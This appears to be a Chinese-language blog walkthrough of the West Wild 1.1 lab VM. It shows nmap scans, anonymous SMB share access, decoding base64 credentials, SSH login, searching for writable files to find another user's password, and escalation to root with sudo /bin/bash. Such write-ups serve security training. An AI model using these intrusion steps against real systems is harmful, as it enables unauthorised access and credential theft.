West Wild 1.1
West Wild 1.1
信息收集
主机发现
1 | nmap -sn 192.168.31.0/24 |
靶机ip为192.168.31.9
端口扫描
1 | nmap -sT --min-rate=10000 -p- 192.168.31.9 -oA nmapscan/ports |
以最低10000的速率扫描全部的端口,并把扫描结果以全格式输出到指定目录
扫描结果:
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─# nmap -sT --min-rate=10000 -p- 192.168.31.9 -oA nmapscan/ports
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-14 14:16 CST
Nmap scan report for WestWild (192.168.31.9)
Host is up (0.0013s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:49:E0:2E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.67 seconds
服务扫描
tcp扫描
1 | nmap -sT -sV -sC -O -p22,80,139,445 192.168.31.9 -oA nmapscan/detail |
-sT:使用tcp协议进行扫描
-sV:探测服务版本
-sC:使用默认脚本
-O:探测操作系统
-p:指定端口
扫描结果:
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
└─# nmap -sT -sC -sV -O -p22,80,139,445 192.168.31.9 -oA nmapscan/detail
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-14 14:24 CST
Nmap scan report for WestWild (192.168.31.9)
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 104594fea72f028a9b211a31c5033048 (RSA)
| 256 9794178618e28e7a738e412076ba5173 (ECDSA)
|_ 256 2381c776bb3778ee3b73e255ad813272 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 00:0C:29:49:E0:2E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h00m00s, deviation: 1h43m55s, median: 0s
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: WESTWILD, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time:
| date: 2023-10-14T06:25:00
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: westwild
| NetBIOS computer name: WESTWILD\x00
| Domain name: \x00
| FQDN: westwild
|_ System time: 2023-10-14T09:25:00+03:00
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.13 seconds重点关注漏洞脚本扫描结果 “Host script results”
UDP扫描
1 | sudo nmap -sU --top-ports 20 192.168.31.9 -oA nmapscan/udp |
-sU:指定使用udp协议
–top-ports:指定扫描前20个端口
扫描结果:
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
└─# sudo nmap -sU --top-ports 20 192.168.31.9 -oA nmapscan/udp
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-14 14:28 CST
Nmap scan report for WestWild (192.168.31.9)
Host is up (0.00043s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:49:E0:2E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 15.39 seconds虽然udp扫描的端口有不稳定的因素,当遇到特殊情况或者需要找一些新的信息的时候可能要用到udp扫描结果
信息分析
分析扫描结果
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
22端口,openssh 6.1.1 版本不算特别高。但是22 ssh服务有漏洞的可能性极小。
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
80端口,apache服务,推测是一个网站服务器
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: westwild
| NetBIOS computer name: WESTWILD\x00
| Domain name: \x00
| FQDN: westwild
|_ System time: 2023-10-14T09:25:00+03:00
samba名:westwild
确定下手顺序
22端口存在漏洞可能性最低,优先级最后
139、445 是samba服务,可能会存在信息泄露,应该先先下手
如果samba服务获取的信息有限,那么将重点放在80端口
确定下手顺序为:
- 139、445
- 80
- 22
可以先使用nmap进行进一步的漏洞脚本扫描
1 | nmap --script=vuln -p22,80,139,445 192.168.31.9 -oA nmapscan/vuln |
扫描结果:
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
└─# nmap -script=vuln -p22,80,139,445 192.168.31.9 -oA nmapscan/voln
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-14 14:54 CST
Stats: 0:00:15 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 83.33% done; ETC: 14:54 (0:00:03 remaining)
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for WestWild (192.168.31.9)
Host is up (0.00045s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:49:E0:2E (VMware)
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-061: false
Nmap done: 1 IP address (1 host up) scanned in 346.34 seconds
尝试
使用smbmap进行samba共享的探测
1 | smbmap -H 192.168.31.9 |
结果:
2
3
4
5
6
7
8
└─# smbmap -H 192.168.31.9
[+] Guest session IP: 192.168.31.9:445 Name: WestWild
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
wave READ ONLY WaveDoor
IPC$ NO ACCESS IPC Service (WestWild server (Samba, Ubuntu))显示3个samba的共享信息
print$ 和 IPC$ 都是默认的,但是permissions都是“no access” 不能访问
wave是可以访问的,试着连接一下
连接smb
1 | smbclient //192.168.31.9/wave |
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─# smbclient //192.168.31.9/wave
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jul 30 13:18:56 2019
.. D 0 Fri Aug 2 07:02:20 2019
FLAG1.txt N 93 Tue Jul 30 10:31:05 2019
message_from_aveng.txt N 115 Tue Jul 30 13:21:48 2019
1781464 blocks of size 1024. 285180 blocks available
smb: \> prompt
smb: \> mget *.txt
getting file \FLAG1.txt of size 93 as FLAG1.txt (30.3 KiloBytes/sec) (average 30.3 KiloBytes/sec)
getting file \message_from_aveng.txt of size 115 as message_from_aveng.txt (56.1 KiloBytes/sec) (average 40.6 KiloBytes/sec)
smb: \>发现有两个文件,通通下载回来
(这里的prompt命令的作用是禁用文件下载时的确认提醒
查看下载下来的文件
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
└─# ls
公共 视频 文档 音乐 FLAG1.txt message_from_aveng.txt starting_point_dguthacker.ovpn
模板 图片 下载 桌面 lab_dguthacker.ovpn nmapscan
┌──(root㉿lkk)-[/home/lkk]
└─# cat message_from_aveng.txt
Dear Wave ,
Am Sorry but i was lost my password ,
and i believe that you can reset it for me .
Thank You
Aveng
┌──(root㉿lkk)-[/home/lkk]
└─# cat FLAG1.txt
RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4KFLAG1.txt 里的东西看起来像base64
message_from_aveng内容:aveng丢失了密码,要求wave帮忙重置
解码一下base64
1 | echo RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K | base64 -d |
2
3
4
5
└─# echo RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K | base64 -d
Flag1{Welcome_T0_THE-W3ST-W1LD-B0rder}
user:wavex
password:door+open一步出明文。
有账号密码了,尝试一下ssh连接看下
1 | ssh wavex@192.168.31.9 |
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
└─# ssh wavex@192.168.31.9
wavex@192.168.31.9's password:
Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Sat Oct 14 10:43:08 +03 2023
System load: 0.52 Processes: 161
Usage of /: 77.9% of 1.70GB Users logged in: 0
Memory usage: 19% IP address for eth0: 192.168.31.9
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical.com/
New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Sat Oct 14 10:43:08 2023
wavex@WestWild:~$ who
wavex pts/0 2023-10-14 10:59 (lkk)
wavex@WestWild:~$ uname -a
Linux WestWild 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:28:33 UTC 2019 i686 athlon i686 GNU/Linux
wavex@WestWild:~$连接成功,试着找找有没有什么有用的信息
开找!命令练习
1 | find / -writable -type f ! -path '/proc/*' 2>/dev/null |
从根目录开始查找所有可写的文件
排除路径为 ‘/proc/*’ 的文件,把错误信息丢掉(一般查询这个目录里的一些文件会报错,为了避免报错信息干扰)
发现有一个ififorget的文件
查看里边的东西能看到aveng的用户名和密码
1 | sudo -l |
sudo -l命令的作用是列出当前用户在系统上可以以超级用户(root)或其他特权用户的身份执行的命令列表。这是用于查看用户的 sudo 权限的命令。
1 | sudo /bin/bash |
root
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Enderman_1's blog!